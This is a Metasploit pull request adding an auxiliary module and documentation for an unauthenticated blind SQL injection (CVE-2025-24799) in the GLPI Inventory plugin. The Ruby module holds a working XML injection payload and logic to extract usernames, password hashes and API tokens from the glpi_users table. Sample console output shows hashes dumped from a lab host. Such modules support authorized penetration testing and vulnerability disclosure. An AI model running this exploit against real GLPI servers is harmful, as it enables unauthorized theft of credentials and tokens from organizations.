### PR TITLE
GLPI Inventory Plugin Unauth Blind Boolean SQLi (CVE-2025-24799)

### DIFF
--- a/documentation/modules/auxiliary/gather/glpi_inventory_plugin_unauth_sqli.md
+++ b/documentation/modules/auxiliary/gather/glpi_inventory_plugin_unauth_sqli.md
@@ -141,8 +141,8 @@ msf6 auxiliary(gather/glpi_inventory_plugin_unauth_sqli) > exploit
 glpi_users
 ==========
 
- name                   password
- ----                   --------
+ name                   password                                                     api_token
+ ----                   --------                                                     ---------
  Plugin_GLPI_Inventory  39
  glpi                   $2y$10$ci01zoEXHWOfoxietd8ry.2K6Y3wR5bc1dZQiftuFM5hqQtPgD6LS
  glpi-system

--- a/documentation/modules/auxiliary/gather/glpi_inventory_plugin_unauth_sqli.md
+++ b/documentation/modules/auxiliary/gather/glpi_inventory_plugin_unauth_sqli.md
@@ -1,0 +1,154 @@
+## Vulnerable Application
+GLPI <= 1.0.18 fails to properly sanitize user supplied data when sent inside a `SimpleXMLElement`
+(available to unauthenticated users), prior to using it in a dynamically constructed SQL query.
+As a result, unauthenticated attackers can conduct an SQL injection attack to dump sensitive
+data from the backend database such as usernames and password hashes.
+
+In order for GLPI to be exploitable the GLPI Inventory plugin must be installed and enabled, and the "Enable Inventory"
+radio button inside the administration configuration also must be checked.
+
+### Setup on Ubuntu 22.04
+
+Install PHP dependencies:
+```
+sudo add-apt-repository ppa:ondrej/php
+sudo apt install apache2 php8.3 php8.3-curl php8.3-zip php8.3-gd php8.3-intl \
+ php8.3-intl php-pear php8.3-imagick php-bz2 php8.3-imap php-memcache php8.3-pspell   \
+ php8.3-tidy php8.3-xmlrpc php8.3-xsl php8.3-mbstring php8.3-ldap php-cas php-apcu    \
+ libapache2-mod-php8.3 php8.3-mysql mariadb-server
+```
+
+Ensure mariadb and apache are installed and running:
+```
+sudo systemctl status apache2
+sudo systemctl status mariadb
+```
+
+Run the mysql secure installation script, input defaults and your desired username password:
+```
+sudo mysql_secure_installation
+```
+
+Connect to the database:
+```
+sudo mysql -u root -p
+```
+
+Create a database user `msfuser` and a database named `glpi`:
+```
+CREATE USER 'msfuser'@'localhost' IDENTIFIED BY 'notpassword';
+CREATE DATABASE glpi;
+GRANT ALL PRIVILEGES ON glpi.* TO 'msfuser'@'localhost';
+FLUSH PRIVILEGES;
+EXIT;
+```
+
+Download the vulnerable version of GLPI, extract it and move it to `/var/www/html`:
+```
+wget https://github.com/glpi-project/glpi/releases/download/10.0.17/glpi-10.0.17.tgz
+tar -xvf glpi-10.0.17.tgz
+sudo mv glpi /var/www/html/
+```
+
+Download the vulnerable inventory plugin:
+```
+cd /var/www/html/glpi/plugins
+sudo wget https://github.com/glpi-project/glpi-inventory-plugin/releases/download/1.4.0/glpi-glpiinventory-1.4.0.tar.bz2
+sudo tar -xvjf glpi-glpiinventory-1.4.0.tar.bz2
+```
+
+Set the necessary permissions:
+```
+sudo chmod 755 -R /var/www/html/
+sudo chown www-data:www-data -R /var/www/html/
+```
+
+Edit sites-available:
+```
+sudo vim /etc/apache2/sites-available/glpi.conf
+```
+
+Paste:
+```
+<VirtualHost *:80>
+   ServerAdmin admin@your_domain.com
+   DocumentRoot /var/www/html/glpi
+   ServerName your-domain.com
+
+   <Directory /var/www/html/glpi>
+        Options FollowSymlinks
+        AllowOverride All
+        Require all granted
+   </Directory>
+
+   ErrorLog ${APACHE_LOG_DIR}/your-domain.com_error.log
+   CustomLog ${APACHE_LOG_DIR}/your-domain.com_access.log combined
+
+</VirtualHost>
+```
+
+Create the following symlink, rewrite and restart:
+```
+sudo ln -s /etc/apache2/sites-available/glpi.conf /etc/apache2/sites-enabled/glpi.conf
+sudo a2enmod rewrite
+sudo systemctl restart apache2
+```
+
+The application should be now available at `http://127.0.0.1/glpi`, navigate there in a browser to complete the setup wizard.
+Warnings in the `Checking of the compatibility of your environment with the execution of GLPI` can be ignored, click continue.
+It will ask you for the database credentials created above, input them and select the `glpi` database created above.
+
+Once complete you'll be brought to a login page, authenticate using the default credentials `glpi`/`glpi`.
+
+On the left hand side select and expand `Administration` in the dropdown select `Inventory`.
+On the right hand side select `Enable Inventory`, then `Save` at the bottom.
+
+On the left hand side select and expand `Setup` in the dropdown select `Plugins`.
+Near the bottom of the screen find the `GLPI Inventory` plugin and under `Actions` click the install button (Folder icon with `+` symbol).
+After installing the plugin a pop up will appear in the bottom right and ask if you want to enable the plugin, enable it.
+
+Now the application should be vulnerable.
+
+## Options
+
+### DB_COLUMNS
+The number of columns in the database. Can vary between versions, adjust this if exploit does not work initially.
+
+### MAX_ENTRIES
+The maximum  number of entries to dump from the database. More entries will increase module runtime.
+
+## Verification Steps
+
+1. Start msfconsole.
+1. Do: `use gather/glpi_inventory_plugin_unauth_sqli`.
+1. Set the `RHOST`.
+1. Set `MAX_ENTRIES` to `1` to speed up module run time for verification.
+1. Run the module.
+1. Receive a table with one username and it's corresponding password hash.
+
+## Scenarios
+### GLPI 10.0.17 running on Ubuntu 22.04
+```
+msf6 > use gather/glpi_inventory_plugin_unauth_sqli
+msf6 auxiliary(gather/glpi_inventory_plugin_unauth_sqli) > set rhost 172.16.199.130
+rhost => 172.16.199.130
+msf6 auxiliary(gather/glpi_inventory_plugin_unauth_sqli) > exploit 
+[*] Reloading module...
+[*] Running module against 172.16.199.130
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[*] Extracting credential information
+glpi_users
+==========
+
+ name                   password
+ ----                   --------
+ Plugin_GLPI_Inventory  39
+ glpi                   $2y$10$ci01zoEXHWOfoxietd8ry.2K6Y3wR5bc1dZQiftuFM5hqQtPgD6LS
+ glpi-system
+ normal                 $2y$10$iaxy0646EhwsuBbjAgme4uJN6SN.pbyK.ciTCnep67Wq8x.qt1JvS
+ post-only              $2y$10$//Ca44JjRIV/9Hv1IEM1y.v1aEa3FwzytX4QYtKsxyqF/rnOzROei
+ tech                   $2y$10$KjaOxGSyd0CMifvDVNiggOxCVHP0g8jER/jLtZsmF54S63LH5GWIy
+
+[*] Auxiliary module execution completed
+```

--- a/modules/auxiliary/gather/glpi_inventory_plugin_unauth_sqli.rb
+++ b/modules/auxiliary/gather/glpi_inventory_plugin_unauth_sqli.rb
@@ -1,0 +1,127 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::SQLi
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  GET_SQLI_OBJECT_FAILED_ERROR_MSG = 'Unable to successfully retrieve an SQLi object'.freeze
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'GLPI Inventory Plugin Unauthenticated Blind Boolean SQLi',
+        'Description' => %q{
+          GLPI <= 1.0.18 fails to properly sanitize user supplied data when sent inside a `SimpleXMLElement`
+          (available to unauthenticated users), prior to using it in a dynamically constructed SQL query.
+          As a result, unauthenticated attackers can conduct an SQL injection attack to dump sensitive
+          data from the backend database such as usernames and password hashes.
+
+          In order for GLPI to be exploitable the GLPI Inventory plugin must be installed and enabled, and the
+          "Enable Inventory" radio button inside the administration configuration also must be checked.
+        },
+        'Author' => [
+          'rz',        # Initial research
+          'jheysel-r7' # Metasploit module
+        ],
+        'References' => [
+          [ 'URL', 'https://blog.lexfo.fr/glpi-sql-to-rce.html'],
+          [ 'CVE', '2025-24799']
+        ],
+        'License' => MSF_LICENSE,
+        'DisclosureDate' => '2025-03-12',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [ true, 'The URL of the GLPI application', '/glpi/' ]),
+      OptInt.new('DB_COLUMNS', [ true, 'The number of columns in the database. Can vary between versions, adjust this if exploit does not work initially', 10 ]),
+      OptInt.new('MAX_ENTRIES', [ true, 'The maximum  number of entries to dump from the database. More entries will increase module runtime', 6 ])
+    ])
+  end
+
+  def build_xml(payload)
+    <<~EOF
+      <?xml version="1.0" encoding="UTF-8"?>
+      <xml>
+        <QUERY>get_params</QUERY>
+        <deviceid><![CDATA[', #{payload}#{', 0' * datastore['DB_COLUMNS']});#]]></deviceid>
+      </xml>
+    EOF
+  end
+
+  def send_request(payload)
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/index.php/ajax/'),
+      'headers' => {
+        'Content-Type' => 'application/xml'
+      },
+      'data' =>
+         build_xml(payload)
+    })
+  end
+
+  def check
+    res = send_request('select 1=1')
+
+    return Exploit::CheckCode::Safe('Inventory is disabled and needs to be enabled in order to be vulnerable') if res&.body == 'Inventory is disabled'
+
+    @sqli = get_sqli_object
+
+    return Exploit::CheckCode::Unknown(GET_SQLI_OBJECT_FAILED_ERROR_MSG) if @sqli == GET_SQLI_OBJECT_FAILED_ERROR_MSG
+    return Exploit::CheckCode::Vulnerable('Time based blind boolean injection succeeded') if @sqli.test_vulnerable
+
+    Exploit::CheckCode::Safe
+  end
+
+  def get_sqli_object
+    create_sqli(dbms: MySQLi::TimeBasedBlind) do |payload|
+      res = send_request(payload)
+      fail_with Failure::Unreachable, 'Connection failed' unless res
+    end
+  end
+
+  def run
+    @sqli ||= get_sqli_object
+    fail_with(Failure::UnexpectedReply, GET_SQLI_OBJECT_FAILED_ERROR_MSG) unless @sqli
+
+    creds_table = Rex::Text::Table.new(
+      'Header' => 'glpi_users',
+      'Indent' => 1,
+      'Columns' => %w[user password]
+    )
+
+    print_status('Extracting credential information')
+
+    users = @sqli.dump_table_fields('glpi_users', %w[name], '', datastore['MAX_ENTRIES'])
+
+    users.each do |(user, password)|
+      creds_table << [user, password]
+      create_credential({
+        workspace_id: myworkspace_id,
+        origin_type: :service,
+        module_fullname: fullname,
+        username: user,
+        private_type: :nonreplayable_hash,
+        jtr_format: Metasploit::Framework::Hashes.identify_hash(password),
+        private_data: password,
+        service_name: 'GLPI',
+        address: datastore['RHOSTS'],
+        port: datastore['RPORT'],
+        protocol: 'tcp',
+        status: Metasploit::Model::Login::Status::UNTRIED
+      })
+    end
+    print_line creds_table.to_s
+  end
+end

--- a/modules/auxiliary/gather/glpi_inventory_plugin_unauth_sqli.rb
+++ b/modules/auxiliary/gather/glpi_inventory_plugin_unauth_sqli.rb
@@ -36,7 +36,7 @@ class MetasploitModule < Msf::Auxiliary
         'DisclosureDate' => '2025-03-12',
         'Notes' => {
           'Stability' => [CRASH_SAFE],
-          'Reliability' => [REPEATABLE_SESSION],
+          'Reliability' => [],
           'SideEffects' => [IOC_IN_LOGS]
         }
       )
@@ -72,7 +72,8 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def check
-    res = send_request('select 1=1')
+    randnum = SecureRandom.random_number(1000)
+    res = send_request("select #{randnum}=#{randnum}")
 
     return Exploit::CheckCode::Safe('Inventory is disabled and needs to be enabled in order to be vulnerable') if res&.body == 'Inventory is disabled'
 
@@ -98,15 +99,15 @@ class MetasploitModule < Msf::Auxiliary
     creds_table = Rex::Text::Table.new(
       'Header' => 'glpi_users',
       'Indent' => 1,
-      'Columns' => %w[user password]
+      'Columns' => %w[user password api_token]
     )
 
     print_status('Extracting credential information')
 
-    users = @sqli.dump_table_fields('glpi_users', %w[name], '', datastore['MAX_ENTRIES'])
+    users = @sqli.dump_table_fields('glpi_users', %w[name password api_token], '', datastore['MAX_ENTRIES'])
 
-    users.each do |(user, password)|
-      creds_table << [user, password]
+    users.each do |(user, password, api_token)|
+      creds_table << [user, password, api_token]
       create_credential({
         workspace_id: myworkspace_id,
         origin_type: :service,

--- a/modules/auxiliary/gather/glpi_inventory_plugin_unauth_sqli.rb
+++ b/modules/auxiliary/gather/glpi_inventory_plugin_unauth_sqli.rb
@@ -8,6 +8,9 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::SQLi
   prepend Msf::Exploit::Remote::AutoCheck
 
+  class SqliObjectError < StandardError; end
+  class TargetNotVulnerableError < StandardError; end
+
   GET_SQLI_OBJECT_FAILED_ERROR_MSG = 'Unable to successfully retrieve an SQLi object'.freeze
 
   def initialize(info = {})
@@ -44,7 +47,6 @@ class MetasploitModule < Msf::Auxiliary
 
     register_options([
       OptString.new('TARGETURI', [ true, 'The URL of the GLPI application', '/glpi/' ]),
-      OptInt.new('DB_COLUMNS', [ true, 'The number of columns in the database. Can vary between versions, adjust this if exploit does not work initially', 10 ]),
       OptInt.new('MAX_ENTRIES', [ true, 'The maximum  number of entries to dump from the database. More entries will increase module runtime', 6 ])
     ])
   end
@@ -54,7 +56,7 @@ class MetasploitModule < Msf::Auxiliary
       <?xml version="1.0" encoding="UTF-8"?>
       <xml>
         <QUERY>get_params</QUERY>
-        <deviceid><![CDATA[', #{payload}#{', 0' * datastore['DB_COLUMNS']});#]]></deviceid>
+        <deviceid><![CDATA[', #{payload}#{', 0' * @extra_columns});#]]></deviceid>
       </xml>
     EOF
   end
@@ -71,30 +73,60 @@ class MetasploitModule < Msf::Auxiliary
     })
   end
 
+  def verify_extra_columns
+    (5..10).each do |extra_cols|
+      @extra_columns = extra_cols
+      if @sqli.test_vulnerable
+        return true
+      end
+    end
+    raise TargetNotVulnerableError, 'This target appears to not be vulnerable'
+  end
+
   def check
     randnum = SecureRandom.random_number(1000)
+    @extra_columns = 10
     res = send_request("select #{randnum}=#{randnum}")
-
     return Exploit::CheckCode::Safe('Inventory is disabled and needs to be enabled in order to be vulnerable') if res&.body == 'Inventory is disabled'
 
-    @sqli = get_sqli_object
+    begin
+      @sqli = get_sqli_object
+    rescue SQLExecutionError => e
+      return CheckCode::Unknown("#{e.class}: #{e.message}")
+    end
 
     return Exploit::CheckCode::Unknown(GET_SQLI_OBJECT_FAILED_ERROR_MSG) if @sqli == GET_SQLI_OBJECT_FAILED_ERROR_MSG
-    return Exploit::CheckCode::Vulnerable('Time based blind boolean injection succeeded') if @sqli.test_vulnerable
 
-    Exploit::CheckCode::Safe
+    begin
+      verify_extra_columns
+    rescue TargetNotVulnerableError => e
+      return Exploit::CheckCode::Safe("#{e.class}: #{e.message}")
+    end
+    Exploit::CheckCode::Vulnerable('Time based blind boolean injection succeeded')
   end
 
   def get_sqli_object
     create_sqli(dbms: MySQLi::TimeBasedBlind) do |payload|
       res = send_request(payload)
-      fail_with Failure::Unreachable, 'Connection failed' unless res
+      raise SqliObjectError, 'Module failed to create SQLi object' unless res
     end
   end
 
   def run
-    @sqli ||= get_sqli_object
+    @extra_columns = 10
+    begin
+      @sqli ||= get_sqli_object
+    rescue SQLExecutionError => e
+      fail_with(Failure::Unknown, "#{e.class}: #{e.message}")
+    end
+
     fail_with(Failure::UnexpectedReply, GET_SQLI_OBJECT_FAILED_ERROR_MSG) unless @sqli
+
+    begin
+      verify_extra_columns
+    rescue TargetNotVulnerableError => e
+      fail_with(Failure::NoTarget, "#{e.class}: #{e.message}")
+    end
 
     creds_table = Rex::Text::Table.new(
       'Header' => 'glpi_users',


### PR DESCRIPTION
GLPI <= 1.0.18 fails to properly sanitize user supplied data when sent inside a `SimpleXMLElement` (available to unauthenticated users), prior to using it in a dynamically constructed SQL query. As a result, unauthenticated attackers can conduct an SQL injection attack to dump sensitive data from the backend database such as usernames and password hashes.

In order for GLPI to be exploitable the GLPI Inventory plugin must be installed and enabled, and the "Enable Inventory" radio button inside the administration configuration also must be checked.

## Verification
1. Start msfconsole.
1. Do: `use gather/glpi_inventory_plugin_unauth_sqli`.
1. Set the `RHOST`.
1. Set `MAX_ENTRIES` to `1` to speed up module run time for verification.
1. Run the module.
1. Receive a table with one username and it's corresponding password hash.

## Testing
```
msf6 > use gather/glpi_inventory_plugin_unauth_sqli
msf6 auxiliary(gather/glpi_inventory_plugin_unauth_sqli) > set rhost 172.16.199.130
rhost => 172.16.199.130
msf6 auxiliary(gather/glpi_inventory_plugin_unauth_sqli) > exploit 
[*] Reloading module...
[*] Running module against 172.16.199.130
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Extracting credential information
glpi_users
==========
 name                   password
 ----                   --------
 Plugin_GLPI_Inventory  39
 glpi                   $2y$10$ci01zoEXHWOfoxietd8ry.2K6Y3wR5bc1dZQiftuFM5hqQtPgD6LS
 glpi-system
 normal                 $2y$10$iaxy0646EhwsuBbjAgme4uJN6SN.pbyK.ciTCnep67Wq8x.qt1JvS
 post-only              $2y$10$//Ca44JjRIV/9Hv1IEM1y.v1aEa3FwzytX4QYtKsxyqF/rnOzROei
 tech                   $2y$10$KjaOxGSyd0CMifvDVNiggOxCVHP0g8jER/jLtZsmF54S63LH5GWIy
[*] Auxiliary module execution completed
```